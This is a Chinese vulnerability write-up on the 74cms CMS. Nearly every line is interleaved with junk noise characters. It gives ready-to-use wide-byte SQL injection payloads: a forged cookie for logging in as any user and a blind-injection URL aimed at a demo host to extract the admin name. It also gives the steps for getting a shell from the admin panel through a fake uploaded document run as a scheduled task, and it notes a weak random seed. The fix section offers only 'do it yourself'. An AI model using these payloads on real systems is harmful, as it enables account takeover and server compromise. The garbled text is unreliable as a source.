0x1 任意用户登录
8 \" s% t; B4 p4 S! t u; n$ m: X% c8 l4 q
0x2 盲注
, D( O0 q0 v" B( _- I! J ^6 }9 L9 c# u4 s
0x3 后台拿shell
& U( m) O. q, f7 J! Z" l
+ s$ l: E8 c5 K 0x4 随机函数问题
5 l+ g) R7 L( ~; J2 e) d# `% e2 H% N
详细说明:9 [6 K' y- I7 @# c* z) S
t6 J: X' j m8 m1 c4 P 0x1 任意用户登录
- z8 V5 r0 T% b j" Z) d! M! x7 P( M- ]5 d
user/login.php/ B$ r' H! I5 g& z% [; S- W
- F p% ]+ G; t; g, p elseif((empty($_SESSION['uid']) || empty($_SESSION['username']) || empty($_SESSION['utype'])) && $_COOKIE['QS']['username'] && $_COOKIE['QS']['password'] && $_COOKIE['QS']['uid'])
3 u* N I2 d' l- s# ~. J/ U0 ?7 z6 U9 X; s) |6 p" m. z
{
2 A+ a8 c0 a+ x' d C/ K
% d) s7 _! K! ~6 n o& [ if(check_cookie($_COOKIE['QS']['username'],$_COOKIE['QS']['password']))2 y7 F3 p7 R% X
* y: x. f2 J4 I! D0 c! p/ Q4 _ {" X. ~- W, y5 g- T' c$ l( R) @
" b6 k1 j' {3 E8 R; ^
update_user_info($_COOKIE['QS']['uid'],false,false);
% L9 ?; W1 S6 |, d- n3 v
' J' g3 Y0 [4 N( B0 h8 a8 g( L header("Location:".get_member_url($_SESSION['utype']));9 u! ]0 r6 o) n2 e2 F: R& k5 x$ U; N
" F. i# f; f' t5 ^' ` }1 C( N- e6 Q) i1 b1 y; G! h* \
1 G9 ]7 k5 N+ ]& S else0 ~/ r* _ @! X* J5 D
! X+ g, w: d% c3 s1 o
{0 K. d4 u$ X' K" r. L. g
# M8 b% q" ^3 a7 W+ H9 i$ ^ unset($_SESSION['uid'],$_SESSION['username'],$_SESSION['utype'],$_SESSION['uqqid'],$_SESSION['activate_username'],$_SESSION['activate_email'],$_SESSION["openid"]);
/ C. K# |) k, ], J# C* e4 D1 ~! i8 I+ k8 {1 r5 o3 o" T
setcookie("QS[uid]","",time() - 3600,$QS_cookiepath, $QS_cookiedomain);; m& ~. a3 |( n) x! x& u) G
+ w$ C0 c! J, {1 ]8 ]8 R% \( @4 R% K' `
setcookie('QS[username]',"", time() - 3600,$QS_cookiepath, $QS_cookiedomain);
8 y9 ?! c+ i- D' K# C
: O4 I" [. M. u4 } setcookie('QS[password]',"", time() - 3600,$QS_cookiepath, $QS_cookiedomain);# ]. L9 g% z% y& V$ n% V# x8 O
2 y6 B1 l& J2 @5 T; S9 s/ E
setcookie("QS[utype]","",time() - 3600,$QS_cookiepath, $QS_cookiedomain);# v, m4 U" ], H N7 @$ y, n
5 T0 [' G" V7 r+ i header("Location:".url_rewrite('QS_login'));
$ T. j% h2 j7 M/ u4 L. t! M1 c
. l* g; {1 Y- E6 Z- g F( P/ u& \ }
# m: ^& a# n- \- D) l( ?% @' @' E; P* v* }" v! r
}7 P6 V/ r8 g( a' v2 [4 a7 r
( z& f0 Z0 q* k7 b( a5 x' J include/fun_user.php! L( @$ w( m5 C
|9 N# `1 J; S1 `" U/ w( P
//检测COOKIE
8 d6 s. p" B+ e4 Q/ `$ ?
& A. E, r3 R% S/ k' X8 S$ b function check_cookie($name,$pwd){
# k9 E# w& [7 ?9 h( e0 c5 j( {3 B% l3 i$ K* i
global $db;. }# h9 ^. ^% D
5 d9 O- |$ ]0 W0 ` $row = $db->getone("SELECT COUNT(*) AS num FROM ".table('members')." WHERE username='{$name}' and password = '{$pwd}'");
* ]2 E; M- L7 w! V
; r* _* k/ S( P0 a& M7 P: ` if($row['num'] > 0)2 ~3 }6 N& u, Y. v* t9 R5 `
) A$ R' a) h: X) g& b! [$ O
{3 [2 ?+ h+ w( z' G
# ]- g6 q$ T# e ^% L2 C
return true;
1 q9 Z x: D6 ~! N( l6 o
9 u. s4 R% K' h$ x% V+ M }else{* q; R: J h" l) L
6 b1 ~" ?$ _1 ?8 \ return false;
, N+ ~, u7 n$ Q k, ]7 K, S) J v* z R( S
}
4 ~1 ^) X6 W, i4 n. L3 w
6 v1 ^5 [; f& u; x; M }
d0 Q* P$ I, _% {) k+ E4 |
7 ], P" G' h8 a0 X 构造cookie如下$ @' v9 }3 E- r' F2 c
8 y4 J( T+ E- t
QS[uid] 2
, _9 I% C! N# P' p. U
" b+ s; q9 |: P QS[utype] 17 u2 \# S, W D* r
7 g6 i# a8 ^+ S# C2 [
QS[password] 111111111111111111111
& }4 N; |& D- `$ F* Z9 e
* A* {3 s x! P* j! I* r QS[username]%bf%27 or 1=1 %231 N* ]6 p; A _
7 t7 u3 z# a, @ uid 为假冒用户的ID utype为用户类型password任意$ J! }- x; u. ~2 d1 y2 L
h2 i5 G5 a0 J7 q 0x2 盲注5 ?: E% c6 Z" l0 n" `
, S9 T2 y8 ?! B) d+ e' y' C/ Y% i http://demo32.74cms.com//resume/resume-list.php?key=test00%bf')/**/and+if((select/**/admin_name/**/from/**/qs_admin/**/limit/**/0,1)=0x61646D696E,benchmark(1000000000,(select/**/1)),1)/**/%236 h& ~8 ]: F5 X B. O& y" |
+ Q) L; o+ n, |5 v+ N
上面两个都是宽字节注入,如果你能猜出管理员密码,还能解出双重md5的话,还能猜出后台路径,继续看下面7 R$ L% T/ m( c+ l" l+ [/ D; ~
+ H( [# K2 R6 M; R* z
0x3 后台拿shell. ^ z- S- ?! k# C+ _; \1 p
' S. d' _5 {% s/ c' T 1.先关闭csrf防御功能
% E& j$ H( `. F' I& e4 C3 _9 P/ i5 v* b5 p& S5 A* u2 c2 V# H
2.在hr工具箱中添加一个伪造的doc,内容为,记下路径data/hrtools/2012/06/1339941553308.doc
/ H" L& h& n% S; |$ D5 f
3 W) u) U9 P. T9 R3 z 3.在工具-计划任务中添加任务,脚本任务填../../data/hrtools/2012/06/1339941553308.doc1 g3 ^% N' Q3 z" Z4 g4 H* |
6 ~# k) v: C- _* |4 X5 W
4.然后执行, M6 w2 k& n, y" @$ K
) S/ B% Y# q- [
0x4 随机函数问题(几乎可以无视,纯属个人YY)# O: ]. U0 O3 p/ K t2 ?" C
% ?9 I, G5 _0 d 在admin_common.fun.inc.php中有个$QS_pwdhash是在安装的时候赋值的,只要能猜出就可已不用解双重md5了。
- P2 ]1 S1 l6 f
% a) F5 |/ F% [* n! e$ U 这个$QS_pwdhash是由randstr生成5 Q/ P! p# F' |/ ~
$ [: k1 g8 L8 z1 S& t% @! b7 \/ ?5 g# N
function randstr($length=6)
, z% M- Q1 N$ `! V Z9 B, Z* h$ m6 h3 Q j0 y& W
{1 n4 n- B" [2 W! _* ]
4 A* N* ?9 S& G$ j+ ] $hash='';
$ o6 x1 W+ b) o. ?; t6 p7 E* f
2 A/ X# \( ~# p2 }' \- V; }3 ` $chars= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz@#!~?:-=';
C, p! J- X0 m& ~* Q0 L( ^+ x# x3 I6 t
$max=strlen($chars)-1;) h% q' T" _+ s8 C2 {7 Q3 c. S" l$ z
" k7 I4 o2 @" x g( N* b; P
mt_srand((double)microtime()*1000000);3 i, ?9 }6 N4 B7 b
: [+ e& |+ z& q for($i=0;$i<$length;$i++) {2 K, t/ I0 ]! c+ t j i& j
7 [& |: V8 {. z' K3 v: _' Z) H4 E $hash.=$chars[mt_rand(0,$max)];) R7 P, E; S$ Z" x
7 F9 [5 B8 K$ D! Z* @
}
+ _8 n3 a0 z% R8 M) ]9 _* Z2 [* }
) W8 @' ]7 W; h* I return $hash;& L. l0 h/ U6 ]8 g9 U* n6 _; f
4 \. v- p* u) V4 L' _ }, J5 S& h. [6 X6 m
3 ]% M# B0 W: |9 t, S# Q 生成长度为6的随机数,mt_srand()播种一样,就会得到一样的随机数,所以我们最多要猜1000000次就可以了(蛋疼)
2 s, [* w; S2 f( D7 |2 I2 w3 X8 E, Y+ T5 h! L$ n0 Y6 ~: ]8 J& K
漏洞证明:, O0 ?, v( Y5 d- W
I/ c; U- L3 ]) E- B' C
修复方案:- s1 E$ b- Q" o0 @5 |
% {- L/ u5 M. o9 L- b9 Q6 T/ j do it yourself~5 e: l% N4 W. @! M" P% i+ X& E
8 w; M8 v; m- t4 ]6 p- U5 o解决一切网站安全,湖盟云防火墙:hnhack.com |
